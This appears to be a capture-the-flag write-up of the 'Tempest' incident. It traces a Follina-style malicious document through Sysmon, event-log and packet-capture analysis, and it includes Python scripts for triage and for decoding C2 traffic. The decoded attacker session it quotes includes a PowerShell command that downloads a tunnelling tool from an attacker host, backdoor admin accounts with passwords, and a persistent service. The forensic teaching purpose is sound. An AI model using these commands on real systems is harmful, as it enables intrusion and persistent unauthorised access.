This challenge focuses on analyzing Sysmon Logs, Windows Event Logs, and Packet Captures. The following is a list of different tools for viewing the data:
Endpoint Log Tools
EvtxECmd: CLI tool that parses Windows Event Logs (.evtx) into different formats
Timeline Explorer: GUI tool for filtering and navigating the parsed data
Opens the CSV files produced by EvtxECmd
SysmonView: Windows GUI to visualize Sysmon logs
Uses the XML files produced by Event Viewer
Event Viewer: Windows GUI to view Windows Event Logs and Sysmon logs
Action > Save All Events As... > XML
Network Logs
Wireshark
Brim
Tempest Incident - Initial Access
Malicious Document
The following is essential information generated by the CRITICAL alert caused by a malicious document:
The malicious document has a .doc extension
The user downloaded the malicious document via chrome.exe
The malicious document then executed a chain of commands to attain code execution
Using the Timeline Explorer and searching for the string ".doc", 13 events are found relating to the malicious document. One in particular provides a large amount of information:
It's also possible to use SysmonView to interpret the events happening on processes like chrome.exe or WinWord.exe.
Name of document: free_magicules.doc
Name of machine: TEMPEST
Name of user: benimaru
PID of Microsoft Process: 496
A quick search of capture.pcap in Wireshark also shows that the IP address and website name are 167.71.199.191 and hxxp[://]phishteam[.]xyz (defanged form). Searching Timeline Explorer for the PID found (496) turns up some interesting executable information:
To get the full path, run gci env: to list the environment variables, specifically APPDATA. This is C:\Users\user\AppData\Roaming\, where "user" is replaced by the account name, here Benimaru. Combining the variable with the rest of the path gives C:\Users\Benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.zip. The same path can be found by searching for "update.zip" in Timeline Explorer and looking at PayloadData4.
The file is placed in the Startup folder. Autostart execution runs with explorer.exe as the parent process, so child processes of explorer.exe within the event timeframe could be significant. Any process creation (Event ID 1) or file creation (Event ID 11) following the document execution is worth checking. Searching Timeline Explorer for events with that parent process shows the following executable info:
The file "first.exe" is likely the malicious binary for stage 2 execution. Searching for "first.exe" shows a number of commands run involving the file:
Investigating the payload of C:\Users\Public\Downloads\first.exe shows the hashes logged with the binary.
SHA256 for first.exe: CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8
C2 Server: http://resolvecyber.xyz:80/
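As an added example (not part of the original write-up), a small triage script over a Sysmon XML export in the layout Event Viewer produces, flagging the two patterns walked through above: Event ID 11 writes into a Startup folder, and Event ID 1 children of WinWord.exe or of explorer.exe launched from a Public or Startup path. The XML sample, the Office install path and the root wrapper element are constructed.

```python
import xml.etree.ElementTree as ET

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
STARTUP_DIR = "\\start menu\\programs\\startup\\"

# Constructed sample modelled on an Event Viewer XML export of the Sysmon channel:
# one file-create (ID 11) into the user's Startup folder, one process-create (ID 1)
# of first.exe under explorer.exe, and one benign explorer.exe child as a control.
SAMPLE_XML = """<Events>
<Event xmlns="%(ns)s"><System><EventID>11</EventID></System><EventData>
<Data Name="Image">C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE</Data>
<Data Name="TargetFilename">C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip</Data>
</EventData></Event>
<Event xmlns="%(ns)s"><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\\Users\\Public\\Downloads\\first.exe</Data>
<Data Name="ParentImage">C:\\Windows\\explorer.exe</Data>
<Data Name="CommandLine">"C:\\Users\\Public\\Downloads\\first.exe"</Data>
</EventData></Event>
<Event xmlns="%(ns)s"><System><EventID>1</EventID></System><EventData>
<Data Name="Image">C:\\Windows\\System32\\notepad.exe</Data>
<Data Name="ParentImage">C:\\Windows\\explorer.exe</Data>
<Data Name="CommandLine">notepad.exe</Data>
</EventData></Event>
</Events>""" % {"ns": EVT_NS}

def sysmon_events(xml_text):
    """Yield (event_id, {Data Name: value}) for every event in the export."""
    for event in ET.fromstring(xml_text).iter("{%s}Event" % EVT_NS):
        event_id = int(event.find("{%s}System/{%s}EventID" % (EVT_NS, EVT_NS)).text)
        # Sysmon puts every field in <EventData><Data Name="...">; key them by Name
        data = {d.get("Name"): d.text or "" for d in event.iter("{%s}Data" % EVT_NS)}
        yield event_id, data

def triage(xml_text):
    """Flag Startup-folder writes and suspicious explorer.exe/WinWord.exe children."""
    findings = []
    for event_id, d in sysmon_events(xml_text):
        image, parent = d.get("Image", "").lower(), d.get("ParentImage", "").lower()
        if event_id == 11 and STARTUP_DIR in d.get("TargetFilename", "").lower():
            findings.append("persistence: %s wrote %s" % (d["Image"], d["TargetFilename"]))
        elif event_id == 1 and (parent.endswith("\\winword.exe")
                                or (parent.endswith("\\explorer.exe")
                                    and ("\\users\\public\\" in image or STARTUP_DIR in image))):
            findings.append("suspicious child: %s -> %s" % (d["ParentImage"], d["CommandLine"]))
    return findings
```

On a real export, feed the file contents to triage() and pivot on the flagged rows in Timeline Explorer; the benign notepad.exe row shows the explorer.exe rule only fires for the Public and Startup paths.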
Malicious Document Traffic
The C2 server has the following information:
IP and Port: 167.71.222.162:80
DNS Query: resolvecyber.xyz
This information helps build the following Wireshark filter to see all the communication going to the C2, specifically the encoded requests: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http
C2 Encoding: Base64
C2 Parameter: q
C2 URL Path: /9ab62b5
C2 HTTP Method: GET
C2 Programming Language: Nim
Discovery - Internal Reconnaissance
Going back to the C2 communication, I wanted to see what commands and responses were going through. The first step is to get the queries into one file. I used the following filter: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http.request.uri contains "q". Then I exported the packet dissections as plain text with only the packet summary line, to isolate the query line.
Using a simple Python script, the base64 strings can be extracted and decoded. The following is the script I wrote:
import base64

base64_list = []
# Isolates the base64 in each summary line
with open("export.txt", "r") as f:
    for line in f.readlines():
        # Splits on spaces to get the request URI (field 7), then strips the
        # "/9ab62b5?q=" prefix (11 characters) to leave only the parameter value
        line = line.split()[7][11:]
        base64_list.append(line)

# Decodes the base64 and writes the result to a file
with open("decoded.txt", "w") as f:
    for line in base64_list:
        decoded = base64.b64decode(line).decode("utf-8")
        # Newline-terminate each decoded request so consecutive outputs do not run together
        f.write(decoded.rstrip("\n") + "\n")
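The script above depends on the URI sitting in field 7 and the prefix being exactly 11 characters. As an added example (mine, not the write-up's), here is a variant that locates the request URI by pattern, pulls the q parameter with a URL parser, and tolerates base64 whose padding was dropped. The export lines are constructed to match the summary-line format; the path and parameter name are the ones from the capture.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of a Wireshark "packet summary line" export; the Info
# column is the tail of each line. Line 1 is a bare beacon with no q parameter,
# line 2 carries "whoami - tempest\benimaru" in base64, and line 3 is the same
# value with its "==" padding stripped, as some implants send it.
EXPORT_LINES = """\
10 1.001 192.168.254.107 167.71.222.162 HTTP 180 GET /9ab62b5 HTTP/1.1
12 1.210 192.168.254.107 167.71.222.162 HTTP 216 GET /9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ== HTTP/1.1
14 1.420 192.168.254.107 167.71.222.162 HTTP 214 GET /9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ HTTP/1.1
"""

REQUEST_RE = re.compile(r"\b(?:GET|POST)\s+(\S+)\s+HTTP/")


def b64_decode_lenient(value):
    """Decode base64 that may have lost its '=' padding; None if not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def decode_c2_queries(text, param="q"):
    """Return the decoded value of every C2 query parameter, in capture order."""
    results = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        for encoded in query.get(param, []):
            # parse_qs turns '+' into a space; '+' is a base64 digit, so restore it
            decoded = b64_decode_lenient(encoded.replace(" ", "+"))
            if decoded is not None:
                results.append(decoded)
    return results


if __name__ == "__main__":
    for entry in decode_c2_queries(EXPORT_LINES):
        print(entry)
```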
It can also be done in bash using sed and awk:
The following text file is the decoded output; it shows the session in which the attacker created new users and set up persistence:
whoami - tempest\benimaru
pwd -
Path
----
C:\Windows\system32
dir C:\Users -
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/20/2022 9:06 PM benimaru
d-r--- 6/20/2022 4:03 PM Public
d----- 6/20/2022 11:52 PM rimuru
net users -
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed successfully.
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
net user benimaru - User name benimaru
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 9:18:04 PM
Password expires Never
Password changeable 6/20/2022 9:18:04 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/21/2022 1:14:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
dir C:\Users\benimaru -
Directory: C:\Users\benimaru
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/20/2022 4:13 PM 3D Objects
d-r--- 6/20/2022 4:13 PM Contacts
d-r--- 6/21/2022 12:27 AM Desktop
d-r--- 6/20/2022 9:20 PM Documents
d-r--- 6/21/2022 1:13 AM Downloads
d-r--- 6/20/2022 4:13 PM Favorites
d-r--- 6/20/2022 4:13 PM Links
d-r--- 6/20/2022 4:13 PM Music
dar--- 6/21/2022 1:15 AM OneDrive
d-r--- 6/20/2022 4:13 PM Pictures
d-r--- 6/20/2022 4:13 PM Saved Games
d-r--- 6/20/2022 4:13 PM Searches
d-r--- 6/20/2022 5:57 PM Videos
dir C:\Users\benimaru\documents - dir C:\users\benimaru\Desktop -
Directory: C:\users\benimaru\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2022 11:34 PM 268 automation.ps1
-a---- 6/20/2022 4:13 PM 1446 Microsoft Edge.lnk
cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
netstat -ano -p tcp -
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904
powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - dir C:\Users\benimaru\Downloads\ch.exe -
Directory: C:\Users\benimaru\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2022 1:17 AM 8230912 ch.exe
whoami - nt authority\system
pwd -
Path
----
C:\Windows\system32
net user shuna princess - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user shuna - net user shuna pr1nc3ss! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user shion m4st3rch3f! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
net user Administrator ch4ng3dpassword! - The command completed successfully.
cmd.exe /c net user shion m4st3rch3f!!! - net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
whoami /priv -
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege I
sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:
The specified service already exists.
sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS
sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TempestUpdate2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\final.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TempestUpdate2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
net user /add shuna princess - The command completed successfully.
net user /add shion m4st3rch3f! - The command completed successfully.
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
net localgroup administrators /add shion - The command completed successfully.
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
Password Discovered: infernotempest
Listening Port Remote Shell: 5985 (WinRM)
After enumerating the listening ports, the attacker establishes a reverse SOCKS proxy to access the internal services. The first command they use is powershell iwr http://phishteam.xyz/02dcf07/ch.exe, which downloads a file called ch.exe. Searching for this file in Timeline Explorer shows how the attacker used the process.
Searching VirusTotal for the hash identifies the binary as "chisel". Chisel is a fast tunnel, transported over HTTP and secured via SSH; it is a single executable that works as both client and server.
One of the processes found has the command line C:\Windows\system32\wsmprovhost.exe -Embedding. wsmprovhost.exe hosts an active remote session on the target; it is the plug-in host process for WinRM. WinRM was most likely the service the attacker authenticated to in order to escalate privileges.
The output from the decoded base64 shows a number of useful things for this section:
New Users Created: shion, shuna
Missing Option: /add
Command to add administrator:
net localgroup administrators /add shion
This payload belongs to an exploit called Follina, which leverages remote templates to execute a PowerShell payload using the "ms-msdt" MSProtocol URI scheme. A successful attack results in a remote, unauthenticated attacker taking control of an affected system.